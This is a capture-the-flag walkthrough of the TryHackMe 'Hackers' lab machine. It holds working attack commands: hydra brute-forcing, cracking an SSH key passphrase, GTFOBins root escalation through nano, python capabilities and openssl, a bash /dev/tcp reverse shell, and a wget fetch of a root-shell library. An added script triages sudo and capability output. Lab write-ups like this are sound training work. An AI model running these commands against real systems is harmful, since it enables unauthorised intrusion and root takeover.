TryHackMe KoTH Machine Hackers

KoTH Hackers


IP: 10.10.228.111


Open Ports Via Nmap -

nmap -sC -sV 10.10.228.111

21 (ftp)
22 (ssh)
80 (http)
9999


Subdirectories Via Gobuster -

/news
/contact
/img
/staff
/backdoor


Login via ftp anonymously -

Anonymous FTP login works and exposes a note. Reading the note with cat gives us the usernames to brute-force, gcrawford and rcampbell, which we run through hydra next.


Gcrawford Credentials Via Hydra -
hydra -l gcrawford -P /usr/share/wordlists/rockyou.txt 10.10.228.111 ftp

username: gcrawford
password: PAOLA

Login via ftp using these creds. The .ssh directory in gcrawford's FTP home holds the user's id_rsa private key, so cd into .ssh and download it.

The key is passphrase-protected, so we crack the passphrase with John the Ripper: convert the key with ssh2john, then run john against rockyou -

ssh2john id_rsa > forjohn

john forjohn --wordlist=/usr/share/wordlists/rockyou.txt

We got the passphrase for the private key -

id_rsa:25192519

Login via ssh as gcrawford using id_rsa (ssh refuses a private key that is readable by other users, so set its mode to 600 first) -

ssh -i id_rsa gcrawford@10.10.228.111

Privilege escalation for gcrawford: the user can run nano with sudo.

sudo -l

nano is on GTFOBins. Inside the editor, Ctrl+R then Ctrl+X opens an "execute command" prompt; the command below swaps the editor's stdin/stdout for a shell, which runs as root because nano was started with sudo -

sudo nano
^R^X
reset; sh 1>&0 2>&0

Rcampbell Credentials Via Hydra -
hydra -l rcampbell -P /usr/share/wordlists/rockyou.txt 10.10.228.111 ftp

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674581280491/9ed48854-301b-42de-82d3-8c0e7215656b.png)

username: rcampbell
password: molly

Login via ftp using rcampbell credentials -

ftp 10.10.228.111

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674581506997/9f2d1f7a-9a1b-4e1b-8ef7-9555a44404ad.png)

Login via ssh as rcampbell with the same password the user had for ftp, then search for files with capabilities -

getcap -r / 2>/dev/null

The output lists a python3 binary with cap_setuid, which lets that binary switch its uid to 0. Run the exact path getcap reported, since only that file carries the capability; to get root, we can do -

python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
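As an added example (not code from the original write-up), the script below triages `sudo -l` and `getcap -r /` output for the two escalation routes this box uses: a sudo-able binary with a GTFOBins entry (nano here for gcrawford, and openssl for production later in the walkthrough) and a file carrying a capability such as cap_setuid. The two sample outputs, the GTFO_SUDO list and the DANGEROUS_CAPS list are all constructed for the example; on a real box, feed the actual tool output into the two functions as shown in the comment at the end.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Triages `sudo -l` and `getcap -r /` output for the two privesc routes
# this box uses. All inputs below are constructed stand-ins shaped like
# the real tools' output; nothing here touches a target.

# Constructed `sudo -l` output (nano as for gcrawford, openssl as for
# production, plus a third entry so more than one line matches).
SUDO_L_SAMPLE='Matching Defaults entries for gcrawford on ubuntu:
    env_reset, mail_badpass

User gcrawford may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/nano
    (root) /usr/bin/openssl
    (ALL) /usr/bin/less'

# Constructed `getcap -r / 2>/dev/null` output. libcap before 2.41 prints
# "path = caps"; newer releases print "path caps". Both layouts are
# included so the parser is exercised on each.
GETCAP_SAMPLE='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.6 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/tar cap_dac_read_search=ep'

# Hypothetical short list of binaries with a GTFOBins "sudo" entry.
GTFO_SUDO='nano openssl less vim find python3'

# Capabilities that give root-equivalent power on their own.
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace'

# Print the basename of each sudo-able command that is in GTFO_SUDO.
# Rule lines look like "(user) [NOPASSWD:] /path/to/bin [args]".
sudo_gtfobins() {
    printf '%s\n' "$1" | awk -v list="$GTFO_SUDO" '
        BEGIN { n = split(list, arr, " "); for (i = 1; i <= n; i++) want[arr[i]] = 1 }
        $1 ~ /^[(]/ {
            path = ""
            for (i = 2; i <= NF; i++) if (index($i, "/") == 1) { path = $i; break }
            if (path == "") next
            m = split(path, parts, "/"); base = parts[m]
            if (base in want) print base
        }'
}

# Print "path capability" for every file whose capability set contains
# one of DANGEROUS_CAPS (paths containing spaces are not handled).
getcap_dangerous() {
    printf '%s\n' "$1" | awk -v list="$DANGEROUS_CAPS" '
        BEGIN { n = split(list, arr, " "); for (i = 1; i <= n; i++) bad[arr[i]] = 1 }
        NF >= 2 {
            path = $1; caps = $NF           # last field is the cap set in both layouts
            sub(/[=+][a-z]+$/, "", caps)   # drop the "+ep" / "=ep" flag suffix
            k = split(caps, cs, ",")
            for (i = 1; i <= k; i++) if (cs[i] in bad) { print path, cs[i]; break }
        }'
}

# On the real box: sudo_gtfobins "$(sudo -l)"
#                  getcap_dangerous "$(getcap -r / 2>/dev/null)"
echo "sudo-able GTFOBins:"; sudo_gtfobins "$SUDO_L_SAMPLE"
echo "dangerous capabilities:"; getcap_dangerous "$GETCAP_SAMPLE"
```

Both functions only parse text, so they can be run on output copied from a restricted shell; the capability parser strips the flag suffix before matching, so cap_setuid+ep and cap_setuid=ep are treated the same.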

Crack the password for the backdoor login (the /api/login endpoint; hydra treats any response containing "Incorrect" as a failed attempt) -

hydra -l plague -P /usr/share/wordlists/rockyou.txt 10.10.228.111 http-post-form "/api/login:username=^USER^&password=^PASS^:Incorrect" -IV

username: plague
password: twentyone

Start a netcat listener on your machine -

nc -lnvp <port>

and trigger a reverse shell through the backdoor with -

bash -i >& /dev/tcp/<ip>/<port> 0>&1

The shell comes back as the user production. To escalate, first check that user's sudo abilities:

sudo -l

openssl is in the sudo list. GTFOBins has an entry for openssl that loads an arbitrary shared library via its -engine option, so we can make a root-running openssl load a library of our own. Check out this blog for more on it: ld_preload-privesc

The library is this C code -

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid, setgid */

/* Runs when openssl dlopen()s the library via -engine; with -nostartfiles
   our _init replaces the one normally supplied by crti.o. sudo runs openssl
   with effective uid 0, so setuid/setgid(0) make the shell fully root. */
void _init() {
    unsetenv("LD_PRELOAD");   /* harmless here; kept from the LD_PRELOAD variant */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Start a Python web server on your machine and fetch shell.so on the target -

python3 -m http.server 80

wget <ip>/shell.so

chmod +x shell.so

Then have root-running openssl load the library through its engine option -

sudo openssl req -engine ./shell.so


Thank you for reading<3
